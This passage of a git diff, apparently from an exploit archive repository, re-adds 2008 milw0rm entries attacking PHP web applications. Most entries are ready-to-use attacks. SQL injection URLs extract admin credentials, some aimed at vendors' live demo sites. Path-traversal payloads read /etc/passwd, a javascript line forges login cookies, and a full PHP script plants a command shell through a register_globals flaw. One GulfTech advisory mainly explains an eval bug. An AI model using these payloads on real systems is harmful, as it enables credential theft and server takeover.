+        do
+        {
+            $data = fread($fid, 4096);
+            if (strlen($data) == 0)
+            {
+                break;
+            }
+            $contents .= $data;
+        }
+        while(true);
+        fclose($fid);
+    }
+
+POC:
+http://XXX.com/collect.php?neturl=../../../etc/passwd
+
+# milw0rm.com [2008-09-18]
diff --git a/platforms/php/webapps/6488.txt b/platforms/php/webapps/6488.txt
index 274d812f8..03d823f9e 100755
--- a/platforms/php/webapps/6488.txt
+++ b/platforms/php/webapps/6488.txt
@@ -1,22 +1,22 @@
-################## sarbot511 #########################################################
-#
-#
-#              jokes script  Remote SQL Injection Exploit
-#
-#    Founded by : sarbot511 
-#    Dork: "All Rights Reserved. Powered by DieselScripts.com" 
-#
-##### Vuln Code: ###################################################################
-#
-#
-###### Exploit #####################################################################
-#
-#   http://www.target.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/*
-#
-###### Greets #######################################################################
-#
-#  Dr.LiNuX  ,  ABO3TB  , ALM511  ,master , all my frinds
-#
-####################################################################################
-
-# milw0rm.com [2008-09-18]
+################## sarbot511 #########################################################
+#
+#
+#              jokes script  Remote SQL Injection Exploit
+#
+#    Founded by : sarbot511 
+#    Dork: "All Rights Reserved. Powered by DieselScripts.com" 
+#
+##### Vuln Code: ###################################################################
+#
+#
+###### Exploit #####################################################################
+#
+#   http://www.target.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/*
+#
+###### Greets #######################################################################
+#
+#  Dr.LiNuX  ,  ABO3TB  , ALM511  ,master , all my frinds
+#
+####################################################################################
+
+# milw0rm.com [2008-09-18]
diff --git a/platforms/php/webapps/6489.txt b/platforms/php/webapps/6489.txt
index cbd081c58..302ea53f4 100755
--- a/platforms/php/webapps/6489.txt
+++ b/platforms/php/webapps/6489.txt
@@ -1,57 +1,57 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com 
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title: ProActive CMS LFI 
-
-#
-# Vendor: http://www.proactivecms.com/
-
-# 
-#
-###########################################################
-#
-# d0rk:n/a
-#
-###########################################################
- 
-     POC:- http://www.site.com/index.php?template=../../../../../../../../../../../../../etc/passwd%00
-	
-
-     
-     
-     Live Demo: 
-	http://www.proactivecms.com/index.php?template=../../../../../../../../../../../../../etc/passwd%00
-
-     
-
-###########################################################
-#
-#  Bug discovered : 18 Sep.2008
-###########################################################
-
-# milw0rm.com [2008-09-18]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
+#                   and all darkc0de members                ---# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com 
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title: ProActive CMS LFI 
+
+#
+# Vendor: http://www.proactivecms.com/
+
+# 
+#
+###########################################################
+#
+# d0rk:n/a
+#
+###########################################################
+ 
+     POC:- http://www.site.com/index.php?template=../../../../../../../../../../../../../etc/passwd%00
+	
+
+     
+     
+     Live Demo: 
+	http://www.proactivecms.com/index.php?template=../../../../../../../../../../../../../etc/passwd%00
+
+     
+
+###########################################################
+#
+#  Bug discovered : 18 Sep.2008
+###########################################################
+
+# milw0rm.com [2008-09-18]
diff --git a/platforms/php/webapps/6492.php b/platforms/php/webapps/6492.php
index eaa87f3db..f14d503f9 100755
--- a/platforms/php/webapps/6492.php
+++ b/platforms/php/webapps/6492.php
@@ -1,182 +1,182 @@
-";
-
-         copy("data/title.dat", "data/settings/title.dat");
-
-         unlink("data/settings/install.dat");
-         copy("data/install.dat", "data/settings/install.dat");
-
-         copy("data/options.php", "data/settings/options.php");
-
-         copy("data/pass.php", "data/settings/pass.php");
-
-         unlink("data/settings/langpref.php");
-         copy("data/inc/lang/langpref.php", "data/settings/langpref.php");
-
-         unlink("data/settings/themepref.php");
-         copy("data/inc/themes/themepref.php", "data/settings/themepref.php");
-         ...
-
-         see the unlink() calls... the subsequent copy() has no results if you
-         don't place the source files there...
-
-         Now look at index.php, lines 21-26:
-         
-         ...
-         //Include security-enhancements
-         include ("data/inc/security.php");
-         //Include Translation data
-         include ("data/settings/langpref.php");
-         include ("data/inc/lang/en.php");
-         include ("data/inc/lang/$langpref");
-         ...
-
-         The script now fails to include the langpref.php script and "langpref" variable is not initialized then,
-         ***if register_globals=on*** you can include arbitraty files from local resources.
-        
-         This check in security.php doesn't work as expected :
-         ... 
-         //Register Globals
-         //If Register Globals are ON, unset injected variables
-         if(isset($_REQUEST)) {
-	   foreach ($_REQUEST as $key => $value) { 
-		if(isset($GLOBALS[$key])) {
-			unset($GLOBALS[$key]); 
-		    }
-	      }
-         }
-         ...
-         ex: http://host/path/index.php?GLOBALS[langpref]=1
-
-         It unsets the "GLOBALS" key from the GLOBALS[] array, while langpref variable remains
-         overwritten...
-
-         You can include the /data/inc/page_editmeta.php script which contains a nice php injection:
-
-         ...
-         if(isset($_POST['Submit'])) {
-         $data = "data/content/$editmeta";
-         include("data/inc/page_stripslashes.php");
-         $file = fopen($data, "w");  
-         fputs($file, " $value) {
-         fputs($file, "\n\$incalbum['$name'] = \"yes\";");
-         } }
-         //Check if we also need to include blogs
-         if ($incblog) {
-         foreach ($incblog as $name => $value) {
-         fputs($file, "\n\$incblog['$name'] = \"yes\";");
-         } }
-         fputs($file, "\n ?>");
-         fclose($file); 
-         ...
-
-         also this check in /data/inc/page_editmeta.php is unuseful because
-         you call it from the main script:
-         
-         ...
-         //Make sure the file isn't accessed directly
-         if((!ereg("index.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("admin.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("install.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("login.php", $_SERVER['SCRIPT_FILENAME']))){
-         //Give out an "access denied" error
-         echo "access denied";
-         //Block all other code
-         exit();
-         }
-         ...
-
-         We choose the /data/count.php to inject a php shell then you can launch commands on the target server.
-                
-         
-        */
-
-        $cmd = "uname";//change here
-        
-        error_reporting(7);
-        $host=$argv[1];
-        $path=$argv[2];
-        $argv[3] ? $port = (int) $argv[3] : $port = 80;
-        $argv[2] ? print("attackin'...\n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]");
-
-        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
-        $win ? dl("php_curl.dll") : dl("php_curl.so");
-
-        $url = "http://$host:$port";
-     
-        function send($url,$header)
-        {
-            $ch = curl_init();
-            curl_setopt($ch, CURLOPT_URL,$url);
-            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
-            curl_setopt($ch, CURLOPT_TIMEOUT, 0);
-            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);
-
-            $data = curl_exec($ch); if (curl_errno($ch)) {
-            print curl_error($ch)."\n";
-            } else {
-               curl_close($ch);
-            }
-            sleep(1);
-            return $data."\n";
-            
-        }
-
-        $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";
-
-        $header ="GET ".$path."update.php?step=3 HTTP/1.0\r\n";
-        $header.="Host: $host\r\nUser-Agent: $agent\r\nConnection: Close\r\n\r\n";
-        send($url,$header);
-
-        //oh, how evil... tested and working against PHP 5.2.4
-        $header ="POST ".$path."index.php HTTP/1.0\r\n";
-        $header.="Host: $host\r\nUser-Agent: $agent\r\n";
-        $header.="Content-Type: application/x-www-form-urlencoded\r\n";
-        $header.="Content-Length: 218\r\n";
-        $header.="Connection: Close\r\n\r\n";
-        $header.="Submit=1&GLOBALS[langpref]=../page_editmeta.php&GLOBALS[editmeta]=../count.php&GLOBALS[sleutel]=\$x{\$y{error_reporting(0)}}\$x{\$y{set_time_limit(0)}}\$x{\$y{print(my_flag)}}\$x{\$y{passthru(\$_SERVER[HTTP_CMD])}}\$x{\$y{die()}}";
-        send($url,$header);
-
-        $header ="GET ".$path."data/count.php HTTP/1.0\r\n";
-        $header.="Host: $host\r\nUser-Agent: $agent\r\n";
-        $header.="CMD: $cmd\r\n";
-        $header.="Connection: Close\r\n\r\n";
-        $out=send($url,$header);
-        $out=explode("my_flag",$out);
-        count($out)==2 ? print("exploit succeeded...\n$out[1]") : print("exploit failed... :(\n");
-?>
-
-# milw0rm.com [2008-09-19]
+";
+
+         copy("data/title.dat", "data/settings/title.dat");
+
+         unlink("data/settings/install.dat");
+         copy("data/install.dat", "data/settings/install.dat");
+
+         copy("data/options.php", "data/settings/options.php");
+
+         copy("data/pass.php", "data/settings/pass.php");
+
+         unlink("data/settings/langpref.php");
+         copy("data/inc/lang/langpref.php", "data/settings/langpref.php");
+
+         unlink("data/settings/themepref.php");
+         copy("data/inc/themes/themepref.php", "data/settings/themepref.php");
+         ...
+
+         see the unlink() calls... the subsequent copy() has no results if you
+         don't place the source files there...
+
+         Now look at index.php, lines 21-26:
+         
+         ...
+         //Include security-enhancements
+         include ("data/inc/security.php");
+         //Include Translation data
+         include ("data/settings/langpref.php");
+         include ("data/inc/lang/en.php");
+         include ("data/inc/lang/$langpref");
+         ...
+
+         The script now fails to include the langpref.php script and "langpref" variable is not initialized then,
+         ***if register_globals=on*** you can include arbitraty files from local resources.
+        
+         This check in security.php doesn't work as expected :
+         ... 
+         //Register Globals
+         //If Register Globals are ON, unset injected variables
+         if(isset($_REQUEST)) {
+	   foreach ($_REQUEST as $key => $value) { 
+		if(isset($GLOBALS[$key])) {
+			unset($GLOBALS[$key]); 
+		    }
+	      }
+         }
+         ...
+         ex: http://host/path/index.php?GLOBALS[langpref]=1
+
+         It unsets the "GLOBALS" key from the GLOBALS[] array, while langpref variable remains
+         overwritten...
+
+         You can include the /data/inc/page_editmeta.php script which contains a nice php injection:
+
+         ...
+         if(isset($_POST['Submit'])) {
+         $data = "data/content/$editmeta";
+         include("data/inc/page_stripslashes.php");
+         $file = fopen($data, "w");  
+         fputs($file, " $value) {
+         fputs($file, "\n\$incalbum['$name'] = \"yes\";");
+         } }
+         //Check if we also need to include blogs
+         if ($incblog) {
+         foreach ($incblog as $name => $value) {
+         fputs($file, "\n\$incblog['$name'] = \"yes\";");
+         } }
+         fputs($file, "\n ?>");
+         fclose($file); 
+         ...
+
+         also this check in /data/inc/page_editmeta.php is unuseful because
+         you call it from the main script:
+         
+         ...
+         //Make sure the file isn't accessed directly
+         if((!ereg("index.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("admin.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("install.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("login.php", $_SERVER['SCRIPT_FILENAME']))){
+         //Give out an "access denied" error
+         echo "access denied";
+         //Block all other code
+         exit();
+         }
+         ...
+
+         We choose the /data/count.php to inject a php shell then you can launch commands on the target server.
+                
+         
+        */
+
+        $cmd = "uname";//change here
+        
+        error_reporting(7);
+        $host=$argv[1];
+        $path=$argv[2];
+        $argv[3] ? $port = (int) $argv[3] : $port = 80;
+        $argv[2] ? print("attackin'...\n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]");
+
+        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+        $win ? dl("php_curl.dll") : dl("php_curl.so");
+
+        $url = "http://$host:$port";
+     
+        function send($url,$header)
+        {
+            $ch = curl_init();
+            curl_setopt($ch, CURLOPT_URL,$url);
+            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+            curl_setopt($ch, CURLOPT_TIMEOUT, 0);
+            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);
+
+            $data = curl_exec($ch); if (curl_errno($ch)) {
+            print curl_error($ch)."\n";
+            } else {
+               curl_close($ch);
+            }
+            sleep(1);
+            return $data."\n";
+            
+        }
+
+        $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";
+
+        $header ="GET ".$path."update.php?step=3 HTTP/1.0\r\n";
+        $header.="Host: $host\r\nUser-Agent: $agent\r\nConnection: Close\r\n\r\n";
+        send($url,$header);
+
+        //oh, how evil... tested and working against PHP 5.2.4
+        $header ="POST ".$path."index.php HTTP/1.0\r\n";
+        $header.="Host: $host\r\nUser-Agent: $agent\r\n";
+        $header.="Content-Type: application/x-www-form-urlencoded\r\n";
+        $header.="Content-Length: 218\r\n";
+        $header.="Connection: Close\r\n\r\n";
+        $header.="Submit=1&GLOBALS[langpref]=../page_editmeta.php&GLOBALS[editmeta]=../count.php&GLOBALS[sleutel]=\$x{\$y{error_reporting(0)}}\$x{\$y{set_time_limit(0)}}\$x{\$y{print(my_flag)}}\$x{\$y{passthru(\$_SERVER[HTTP_CMD])}}\$x{\$y{die()}}";
+        send($url,$header);
+
+        $header ="GET ".$path."data/count.php HTTP/1.0\r\n";
+        $header.="Host: $host\r\nUser-Agent: $agent\r\n";
+        $header.="CMD: $cmd\r\n";
+        $header.="Connection: Close\r\n\r\n";
+        $out=send($url,$header);
+        $out=explode("my_flag",$out);
+        count($out)==2 ? print("exploit succeeded...\n$out[1]") : print("exploit failed... :(\n");
+?>
+
+# milw0rm.com [2008-09-19]
diff --git a/platforms/php/webapps/6494.txt b/platforms/php/webapps/6494.txt
index 375d5f804..79bdc3a49 100755
--- a/platforms/php/webapps/6494.txt
+++ b/platforms/php/webapps/6494.txt
@@ -1,27 +1,27 @@
-================================================================================
-easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability
-================================================================================
-
-
-
-Discovered By: Egypt Coder
-
-home : WWW.Sec-Area.com
-
-Mail: Egyptcoder@hotmail.com
-
-
-
-Dork: Engine powered by easyLink V1.1.0.
-
-
-
-Exploit :
-
-
-http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user
-
-
-Greets  rUnViruS, Error Code, H666p , Fear Master , ProViDoR
-
-# milw0rm.com [2008-09-19]
+================================================================================
+easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability
+================================================================================
+
+
+
+Discovered By: Egypt Coder
+
+home : WWW.Sec-Area.com
+
+Mail: Egyptcoder@hotmail.com
+
+
+
+Dork: Engine powered by easyLink V1.1.0.
+
+
+
+Exploit :
+
+
+http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user
+
+
+Greets  rUnViruS, Error Code, H666p , Fear Master , ProViDoR
+
+# milw0rm.com [2008-09-19]
diff --git a/platforms/php/webapps/6495.txt b/platforms/php/webapps/6495.txt
index 1218fa142..91a6a3676 100755
--- a/platforms/php/webapps/6495.txt
+++ b/platforms/php/webapps/6495.txt
@@ -1,15 +1,15 @@
-==================================
-Explay CMS <= 2.1 Persistent XSS and CSRF
-==================================
-Discovered by hodik
-Mail: n.khodov@gmail.com
-
-1. Persistent XSS
-This CMS has bad anti-XSS filter that cut only some basic vectors. The loginned user can inject persistent XSS by adding to article text or comment  
-
-2. CSRF
-User can get admin rights if admin open malicious page that contain, for instance:
-
-or merely insert it to comment or article text.
-
-# milw0rm.com [2008-09-19]
+==================================
+Explay CMS <= 2.1 Persistent XSS and CSRF
+==================================
+Discovered by hodik
+Mail: n.khodov@gmail.com
+
+1. Persistent XSS
+This CMS has bad anti-XSS filter that cut only some basic vectors. The loginned user can inject persistent XSS by adding to article text or comment  
+
+2. CSRF
+User can get admin rights if admin open malicious page that contain, for instance:
+
+or merely insert it to comment or article text.
+
+# milw0rm.com [2008-09-19]
diff --git a/platforms/php/webapps/6499.txt b/platforms/php/webapps/6499.txt
index 90c75e72f..1e0de6366 100755
--- a/platforms/php/webapps/6499.txt
+++ b/platforms/php/webapps/6499.txt
@@ -1,73 +1,73 @@
-##########################################################
-# GulfTech Security Research           September 20, 2008
-##########################################################
-# Vendor : Electron Inc.
-# URL : http://www.anelectron.com/
-# Version : AEF Forum <= 1.0.6
-# Risk : Remote Code Execution
-##########################################################
-
-
-
-Description:
-Advanced Electron Forum also known as AEF Forum is a full featured
-online forum system written in php that allows webmasters and site
-owners to host their own discussion forums within their website.
-The Advanced Electron Forum software comes bundled with the popular
-MKPortal package, but is also available as a free stand alone forum.
-Unfortunately there are multiple remote code execution issues within
-AEF that allow for an attacker to execute arbitrary php code with
-privileges of the affected webserver. This is due to the improper
-handling of evaluated bbcode within AEF Forum. Users should upgrade
-their forums as soon as possible.
-
-
-
-Remote Code Execution:
-There is a serious security issue within AEF Forums that allows for
-forum users to easily execute arbitrary php code on the affected
-webserver. This issue is due to AEF Forums sending wildcard matches
-to the replacement parameter of preg_replace function, within double
-quotes, while the eval switch is present. Below is one of the many
-examples of the security issues within the bbcode handling of AEF.
-
-//Email Links
-if($globals['bbc_email']){
-
-    $text = preg_replace(
-                array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
-                        "/\[email\](.*?)\[\/email\]/ies"),
-                array('check_email("$1", "$2")',
-                        'check_email("$1", "$1")'), $text);
-
-}
-
-As we can see from the above code, a wildcard match is used to gather
-the matches sent to replacement parameter for evaluation. This is bad
-because an attacker can use complex variable syntax within an [email]
-tag (other tags are also vulnerable) and have it executed as php code.
-
-[email]{${phpinfo()}}[/email]
-
-If the above bb code was posted to a vulnerable AEF Forum then the php
-within the tags would be executed. In this case the php code is simply
-a phpinfo() call, but of course, other attacks are possible.
-
-
-
-Solution:
-Thanks to Jim Haslip for his help with communicating this issue to
-developers. Users should upgrade as soon as possible.
-
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-
-
-Related Info:
-The original advisory can be found at the following location
-http://www.gulftech.org/?node=research&article_id=00131-09202008 
-
-# milw0rm.com [2008-09-20]
+##########################################################
+# GulfTech Security Research           September 20, 2008
+##########################################################
+# Vendor : Electron Inc.
+# URL : http://www.anelectron.com/
+# Version : AEF Forum <= 1.0.6
+# Risk : Remote Code Execution
+##########################################################
+
+
+
+Description:
+Advanced Electron Forum also known as AEF Forum is a full featured
+online forum system written in php that allows webmasters and site
+owners to host their own discussion forums within their website.
+The Advanced Electron Forum software comes bundled with the popular
+MKPortal package, but is also available as a free stand alone forum.
+Unfortunately there are multiple remote code execution issues within
+AEF that allow for an attacker to execute arbitrary php code with
+privileges of the affected webserver. This is due to the improper
+handling of evaluated bbcode within AEF Forum. Users should upgrade
+their forums as soon as possible.
+
+
+
+Remote Code Execution:
+There is a serious security issue within AEF Forums that allows for
+forum users to easily execute arbitrary php code on the affected
+webserver. This issue is due to AEF Forums sending wildcard matches
+to the replacement parameter of preg_replace function, within double
+quotes, while the eval switch is present. Below is one of the many
+examples of the security issues within the bbcode handling of AEF.
+
+//Email Links
+if($globals['bbc_email']){
+
+    $text = preg_replace(
+                array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
+                        "/\[email\](.*?)\[\/email\]/ies"),
+                array('check_email("$1", "$2")',
+                        'check_email("$1", "$1")'), $text);
+
+}
+
+As we can see from the above code, a wildcard match is used to gather
+the matches sent to replacement parameter for evaluation. This is bad
+because an attacker can use complex variable syntax within an [email]
+tag (other tags are also vulnerable) and have it executed as php code.
+
+[email]{${phpinfo()}}[/email]
+
+If the above bb code was posted to a vulnerable AEF Forum then the php
+within the tags would be executed. In this case the php code is simply
+a phpinfo() call, but of course, other attacks are possible.
+
+
+
+Solution:
+Thanks to Jim Haslip for his help with communicating this issue to
+developers. Users should upgrade as soon as possible.
+
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+
+
+Related Info:
+The original advisory can be found at the following location
+http://www.gulftech.org/?node=research&article_id=00131-09202008 
+
+# milw0rm.com [2008-09-20]
diff --git a/platforms/php/webapps/6500.txt b/platforms/php/webapps/6500.txt
index 4f3c17a20..18be20d2d 100755
--- a/platforms/php/webapps/6500.txt
+++ b/platforms/php/webapps/6500.txt
@@ -1,10 +1,10 @@
-###############################################################################################
-[+] Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack                
-[+] Greetz : All my freind               
-################################################################################################
----
-exploit:
-javascript:document.cookie = "login=1; path=/"; document.cookie = "pass=1; path=/";
-
-# milw0rm.com [2008-09-20]
+###############################################################################################
+[+] Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack                
+[+] Greetz : All my freind               
+################################################################################################
+---
+exploit:
+javascript:document.cookie = "login=1; path=/"; document.cookie = "pass=1; path=/";
+
+# milw0rm.com [2008-09-20]
diff --git a/platforms/php/webapps/6501.txt b/platforms/php/webapps/6501.txt
index 6eee2d2f5..1f3fde185 100755
--- a/platforms/php/webapps/6501.txt
+++ b/platforms/php/webapps/6501.txt
@@ -1,32 +1,32 @@
-MyFWB 1.0 Remote SQL Injection
-
-Author: 0x90
-url: www.0x90.com.ar
-Product: MyFWB
-download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip
-Version: 1.0
-URL: http://www.fsoft.co.nr/
-Vulnerability Class: SQL Injection
-contact: Guns[at]0x90[dot]com[dot]ar
-
-
-Username:
-http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user
-
-Password:
-http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user
-
-Email:
-http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user
-
-Secret Key:
-http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user
-
-
-
-
-Online Demostration:
-
-http://myfwb.co.cc/?page=-0x90+union+select+0,0,secret,0+from+user
-
-# milw0rm.com [2008-09-20]
+MyFWB 1.0 Remote SQL Injection
+
+Author: 0x90
+url: www.0x90.com.ar
+Product: MyFWB
+download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip
+Version: 1.0
+URL: http://www.fsoft.co.nr/
+Vulnerability Class: SQL Injection
+contact: Guns[at]0x90[dot]com[dot]ar
+
+
+Username:
+http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user
+
+Password:
+http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user
+
+Email:
+http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user
+
+Secret Key:
+http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user
+
+
+
+
+Online Demostration:
+
+http://myfwb.co.cc/?page=-0x90+union+select+0,0,secret,0+from+user
+
+# milw0rm.com [2008-09-20]
diff --git a/platforms/php/webapps/6502.txt b/platforms/php/webapps/6502.txt
index 7fdfdb2b0..993de7b94 100755
--- a/platforms/php/webapps/6502.txt
+++ b/platforms/php/webapps/6502.txt
@@ -1,40 +1,40 @@
-[~] Diesel Pay Script
-[~]
-[~] index.php (area) sql inj
-[~]
-[~] http://www.dieselscripts.com
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 20.09.2008
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] contact: zorlu@w.cn
-[~] 
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-http://localhost/script_path/index.php?a=browse&area=[SQL]
-
-[SQL]= 
-
-ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*
-
-Demo:
-
-http://www.dieselscripts.com/demo/dieselpay/index.php?a=browse&area=ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
-[~]
-[~] http://www.z0rlu.blogspot.com online : )
-[~]
-[~] home: yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-09-20]
+[~] Diesel Pay Script
+[~]
+[~] index.php (area) sql inj
+[~]
+[~] http://www.dieselscripts.com
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 20.09.2008
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] contact: zorlu@w.cn
+[~] 
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+http://localhost/script_path/index.php?a=browse&area=[SQL]
+
+[SQL]= 
+
+ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*
+
+Demo:
+
+http://www.dieselscripts.com/demo/dieselpay/index.php?a=browse&area=ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
+[~]
+[~] http://www.z0rlu.blogspot.com online : )
+[~]
+[~] home: yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-09-20]
diff --git a/platforms/php/webapps/6503.txt b/platforms/php/webapps/6503.txt
index d3a1d24f5..92195a935 100755
--- a/platforms/php/webapps/6503.txt
+++ b/platforms/php/webapps/6503.txt
@@ -1,59 +1,59 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz        #
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com 
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title:  PlainCart (index.php) SQL Inj
-#
-# Script Download: http://www.phpwebcommerce.com/shopping-cart-source-code.php
-# 
-#
-###########################################################
-#
-# d0rk: n/a
-#
-###########################################################
- 
-     POC 1:- 
-
-         http://www.site.com/[script]/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--
-	
-     
-     
-     
-     Live Demo: 
-	
-	http://www.phpwebcommerce.com/plaincart/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--
-
- 
-    Admin panel: www.site.com/plaincart/admin/login.php
- 
-###########################################################
-#
-#  Bug discovered : 20 Sep.2008
-###########################################################
-
-# milw0rm.com [2008-09-20]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz        #
+#                   and all darkc0de members                ---# 
+################################################################ 
